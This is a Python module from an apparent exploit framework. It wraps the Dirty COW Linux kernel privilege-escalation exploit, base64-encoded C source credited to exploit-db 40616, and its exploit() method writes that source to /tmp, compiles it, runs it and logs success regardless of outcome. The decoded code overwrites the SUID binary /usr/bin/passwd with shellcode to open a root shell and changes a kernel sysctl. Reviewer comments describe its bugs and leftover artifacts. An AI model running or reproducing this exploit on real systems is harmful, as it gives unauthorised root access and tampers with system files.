#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os

try:
    from core.log import Log
    from core.log import color
except Exception as e:
    import sys
    sys.path.append("../../core/log")
    from Log import Log
    from Log import color

class Exploit:
    # Configuration options for this exploit module.
    # Notes:
    #   necessity - whether the option must be set
    #   default   - the option's default value (set_config overwrites this slot)
    # This dict is a class attribute and __init__ assigns nothing, so every
    # instance shares it; a set_config call on one instance is visible to all.
    # The module defines no options, so the dict is empty.
    config = {
    }

    code = '''
        I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHN5cy9tbWFu
        Lmg+CiNpbmNsdWRlIDxmY250bC5oPgojaW5jbHVkZSA8cHRocmVhZC5oPgojaW5jbHVkZSA8c3Ry
        aW5nLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KCnZvaWQgKm1hcDsKaW50IGY7CmludCBzdG9wID0g
        MDsKc3RydWN0IHN0YXQgc3Q7CmNoYXIgKm5hbWU7CnB0aHJlYWRfdCBwdGgxLHB0aDIscHRoMzsK
        CmNoYXIgc3VpZF9iaW5hcnlbXSA9ICIvdXNyL2Jpbi9wYXNzd2QiOwoKLyoKICogKiAkIG1zZnZl
        bm9tIC1wIGxpbnV4L3g2NC9leGVjIENNRD0iZWNobyAwID4gL3Byb2Mvc3lzL3ZtL2RpcnR5X3dy
        aXRlYmFja19jZW50aXNlY3MmJmNwIC1mIC90bXAvYmFrIC91c3IvYmluL3Bhc3N3ZCYmL2Jpbi9i
        YXNoIiBQcmVwZW5kU2V0dWlkPVRydWUgLWYgZWxmIHwgeHhkIC1pCiAqICovCnVuc2lnbmVkIGNo
        YXIgc2NbXSA9IHsKICAweDdmLCAweDQ1LCAweDRjLCAweDQ2LCAweDAyLCAweDAxLCAweDAxLCAw
        eDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4
        MDIsIDB4MDAsIDB4M2UsIDB4MDAsIDB4MDEsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHg3OCwgMHgw
        MCwgMHg0MCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHg0MCwgMHgwMCwgMHgwMCwg
        MHgwMCwKICAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw
        eDAwLCAweDAwLCAweDAwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4NDAsIDB4
        MDAsIDB4MzgsIDB4MDAsIDB4MDEsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHgwMCwgMHgwMCwgMHgw
        MCwgMHgwMCwgMHgwMSwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwNywgMHgwMCwgMHgwMCwgMHgwMCwK
        ICAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw
        eDAwLCAweDQwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4
        NDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHgwMiwgMHgwMSwgMHgwMCwgMHgw
        MCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHg4YywgMHgwMSwgMHgwMCwgMHgwMCwKICAweDAw
        LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDEwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw
        eDAwLCAweDAwLAogIDB4NDgsIDB4MzEsIDB4ZmYsIDB4NmEsIDB4NjksIDB4NTgsIDB4MGYsIDB4
        MDUsIDB4NmEsIDB4M2IsIDB4NTgsIDB4OTksCiAgMHg0OCwgMHhiYiwgMHgyZiwgMHg2MiwgMHg2
        OSwgMHg2ZSwgMHgyZiwgMHg3MywgMHg2OCwgMHgwMCwgMHg1MywgMHg0OCwKICAweDg5LCAweGU3
        LCAweDY4LCAweDJkLCAweDYzLCAweDAwLCAweDAwLCAweDQ4LCAweDg5LCAweGU2LCAweDUyLCAw
        eGU4LAogIDB4NWIsIDB4MDAsIDB4MDAsIDB4MDAsIDB4NjUsIDB4NjMsIDB4NjgsIDB4NmYsIDB4
        MjAsIDB4MzAsIDB4MjAsIDB4M2UsCiAgMHgyMCwgMHgyZiwgMHg3MCwgMHg3MiwgMHg2ZiwgMHg2
        MywgMHgyZiwgMHg3MywgMHg3OSwgMHg3MywgMHgyZiwgMHg3NiwKICAweDZkLCAweDJmLCAweDY0
        LCAweDY5LCAweDcyLCAweDc0LCAweDc5LCAweDVmLCAweDc3LCAweDcyLCAweDY5LCAweDc0LAog
        IDB4NjUsIDB4NjIsIDB4NjEsIDB4NjMsIDB4NmIsIDB4NWYsIDB4NjMsIDB4NjUsIDB4NmUsIDB4
        NzQsIDB4NjksIDB4NzMsCiAgMHg2NSwgMHg2MywgMHg3MywgMHgyNiwgMHgyNiwgMHg2MywgMHg3
        MCwgMHgyMCwgMHgyZCwgMHg2NiwgMHgyMCwgMHgyZiwKICAweDc0LCAweDZkLCAweDcwLCAweDJm
        LCAweDYyLCAweDYxLCAweDZiLCAweDIwLCAweDJmLCAweDc1LCAweDczLCAweDcyLAogIDB4MmYs
        IDB4NjIsIDB4NjksIDB4NmUsIDB4MmYsIDB4NzAsIDB4NjEsIDB4NzMsIDB4NzMsIDB4NzcsIDB4
        NjQsIDB4MjYsCiAgMHgyNiwgMHgyZiwgMHg2MiwgMHg2OSwgMHg2ZSwgMHgyZiwgMHg2MiwgMHg2
        MSwgMHg3MywgMHg2OCwgMHgwMCwgMHg1NiwKICAweDU3LCAweDQ4LCAweDg5LCAweGU2LCAweDBm
        LCAweDA1Cn07CnVuc2lnbmVkIGludCBzY19sZW4gPSAyNTg7CgoKdm9pZCAqbWFkdmlzZVRocmVh
        ZCh2b2lkICphcmcpCnsKICAgIGNoYXIgKnN0cjsKICAgIHN0cj0oY2hhciopYXJnOwogICAgaW50
        IGksYz0wOwogICAgZm9yKGk9MDtpPDEwMDAwMDAgJiYgIXN0b3A7aSsrKSB7CiAgICAgICAgICAg
        IGMrPW1hZHZpc2UobWFwLDEwMCxNQURWX0RPTlRORUVEKTsKICAgICAgICB9CiAgICBwcmludGYo
        InRocmVhZCBzdG9wcGVkXG4iKTsKfQoKdm9pZCAqcHJvY3NlbGZtZW1UaHJlYWQodm9pZCAqYXJn
        KQp7CiAgICBjaGFyICpzdHI7CiAgICBzdHI9KGNoYXIqKWFyZzsKICAgIGludCBmPW9wZW4oIi9w
        cm9jL3NlbGYvbWVtIixPX1JEV1IpOwogICAgaW50IGksYz0wOwogICAgZm9yKGk9MDtpPDEwMDAw
        MDAgJiYgIXN0b3A7aSsrKSB7CiAgICAgICAgICAgIGxzZWVrKGYsbWFwLFNFRUtfU0VUKTsKICAg
        ICAgICAgICAgYys9d3JpdGUoZiwgc3RyLCBzY19sZW4pOwogICAgICAgIH0KICAgIHByaW50Zigi
        dGhyZWFkIHN0b3BwZWRcbiIpOwp9Cgp2b2lkICp3YWl0Rm9yV3JpdGUodm9pZCAqYXJnKSB7CiAg
        ICBjaGFyIGJ1ZltzY19sZW5dOwoKICAgIGZvcig7OykgewogICAgICAgICAgICBGSUxFICpmcCA9
        IGZvcGVuKHN1aWRfYmluYXJ5LCAicmIiKTsKCiAgICAgICAgICAgIGZyZWFkKGJ1Ziwgc2NfbGVu
        LCAxLCBmcCk7CgogICAgICAgICAgICBpZihtZW1jbXAoYnVmLCBzYywgc2NfbGVuKSA9PSAwKSB7
        CiAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ZigiJXMgb3ZlcndyaXR0ZW5cbiIsIHN1aWRf
        YmluYXJ5KTsKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAg
        ICAgfQoKICAgICAgICAgICAgZmNsb3NlKGZwKTsKICAgICAgICAgICAgc2xlZXAoMSk7CiAgICAg
        ICAgfQoKICAgIHN0b3AgPSAxOwoKICAgIHByaW50ZigiUG9wcGluZyByb290IHNoZWxsLlxuIik7
        CiAgICBwcmludGYoIkRvbid0IHdvcnJ5LC91c3IvYmluL3Bhc3N3ZCBoYXMgYmVlbiByZXN0b3Jl
        ZC5cbiIpOwoKICAgIHN5c3RlbShzdWlkX2JpbmFyeSk7Cn0KCmludCBtYWluKGludCBhcmdjLGNo
        YXIgKmFyZ3ZbXSkgewogICAgY2hhciAqYmFja3VwOwoKICAgIHByaW50ZigiRGlydHlDb3cgcm9v
        dCBwcml2aWxlZ2UgZXNjYWxhdGlvblxuIik7CiAgICBwcmludGYoIkJhY2tpbmcgdXAgJXMgdG8g
        L3RtcC9iYWtcbiIsIHN1aWRfYmluYXJ5KTsKCiAgICBhc3ByaW50ZigmYmFja3VwLCAiY3AgJXMg
        L3RtcC9iYWsiLCBzdWlkX2JpbmFyeSk7CiAgICBzeXN0ZW0oYmFja3VwKTsKCiAgICBmID0gb3Bl
        bihzdWlkX2JpbmFyeSxPX1JET05MWSk7CiAgICBmc3RhdChmLCZzdCk7CgogICAgcHJpbnRmKCJT
        aXplIG9mIGJpbmFyeTogJWRcbiIsIHN0LnN0X3NpemUpOwoKICAgIGNoYXIgcGF5bG9hZFtzdC5z
        dF9zaXplXTsKICAgIG1lbXNldChwYXlsb2FkLCAweDkwLCBzdC5zdF9zaXplKTsKICAgIG1lbWNw
        eShwYXlsb2FkLCBzYywgc2NfbGVuKzEpOwoKICAgIG1hcCA9IG1tYXAoTlVMTCxzdC5zdF9zaXpl
        LFBST1RfUkVBRCxNQVBfUFJJVkFURSxmLDApOwoKICAgIHByaW50ZigiUmFjaW5nLCB0aGlzIG1h
        eSB0YWtlIGEgd2hpbGUuLlxuIik7CgogICAgcHRocmVhZF9jcmVhdGUoJnB0aDEsIE5VTEwsICZt
        YWR2aXNlVGhyZWFkLCBzdWlkX2JpbmFyeSk7CiAgICBwdGhyZWFkX2NyZWF0ZSgmcHRoMiwgTlVM
        TCwgJnByb2NzZWxmbWVtVGhyZWFkLCBwYXlsb2FkKTsKICAgIHB0aHJlYWRfY3JlYXRlKCZwdGgz
        LCBOVUxMLCAmd2FpdEZvcldyaXRlLCBOVUxMKTsKCiAgICBwdGhyZWFkX2pvaW4ocHRoMywgTlVM
        TCk7CgogICAgcmV0dXJuIDA7Cn0K
        '''

    def __init__(self):
        '''Create the module object; there is no per-instance state to set up.'''
        return None

    def exploit(self):
        '''
        Core routine of the module: build and run the embedded proof-of-concept.

        Decodes the base64 text held in ``self.code``, writes it to
        /tmp/dirtyc0w.c, compiles it with gcc into /tmp/dirtyc0w, runs the
        binary, then deletes both files.  Takes no arguments and returns None.

        Reviewer notes:
          * Python 2 only: ``str.decode("base64")`` does not exist on Python 3.
          * Neither os.system() exit status is checked, and the final success
            message is logged unconditionally, so it does not show that the
            compile step or the binary succeeded.
          * For triage: besides the two files removed here, the decoded C
            source appears to copy /usr/bin/passwd to /tmp/bak and to write 0
            to /proc/sys/vm/dirty_writeback_centisecs; nothing in this method
            removes or reverts either, so both can remain as host artifacts.
        '''
        Log.Log.info("Creating source code...")
        # NOTE(review): fixed, predictable name in /tmp (typically
        # world-writable); open(..., "w") follows an existing symlink and
        # truncates whatever it points to.
        with open("/tmp/dirtyc0w.c", "w") as f:
            f.write(self.code.decode("base64"))
        Log.Log.info("Compiling...")
        # Requires gcc on the host; the exit status is discarded.
        os.system("gcc -o /tmp/dirtyc0w /tmp/dirtyc0w.c -pthread")
        Log.Log.info("Executing...")
        # Runs whatever is at this path, even if the compile step failed.
        os.system("/tmp/dirtyc0w")
        Log.Log.info("Cleaning...")
        # Removes only the source file and the binary written above.
        os.system("rm -rf /tmp/dirtyc0w")
        os.system("rm -rf /tmp/dirtyc0w.c")
        # Logged regardless of what the commands above returned.
        Log.Log.success("Exploit success!")

    def show_options(self):
        '''
        Print the module's option table (the entries of ``config``).

        Triggered by the ``options`` command; normally left unchanged.
        Prints nothing when the module defines no options.
        '''
        if not self.config.keys():
            return
        Log.Log.warning("Options\t\tNecessity\t\tDefault")
        Log.Log.warning("-------\t\t---------\t\t-------")
        row_format = "%s\t\t%s\t\t\t%s"
        for name in sorted(self.config.keys()):
            necessity = self.config[name]["necessity"]
            current = self.get_config(name)
            Log.Log.warning(row_format % (name, necessity, current))

    def set_config(self, key, value):
        '''
        Change the value of one module option.

        Triggered by the ``set`` command; normally left unchanged.  An
        unknown option name is reported through the logger and nothing is
        stored.
        '''
        if key not in self.config.keys():
            Log.Log.error("No such option!")
            return
        # The new value replaces the option's "default" slot.
        self.config[key]["default"] = value

    def get_config(self, key):
        '''
        Return the current value stored for option ``key``.

        The value is read from the option's "default" slot; an unknown
        key raises KeyError.
        '''
        option = self.config[key]
        return option["default"]

    def show_info(self):
        '''
        Log the module's description: name, affected versions, author and
        reference link.

        Per the original author's note this is called automatically when the
        module is loaded, and the text should be edited to match the module.
        '''
        info_lines = (
            "Name: Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)",
            "Effected Version: 2.6.22 < 3.9 (x86/x64)",
            "Author: Robin Verton",
            "Refer:",
            "\thttps://www.exploit-db.com/exploits/40616/",
        )
        for line in info_lines:
            Log.Log.info(line)

def main():
    '''
    Self-test driver: log the module info and options, then run the module.
    '''
    module = Exploit()
    for step in (module.show_info, module.show_options, module.exploit):
        step()

# Script entry point: run the self-test only when this file is executed
# directly, not when it is imported as a module.
if __name__ == "__main__":
    main()
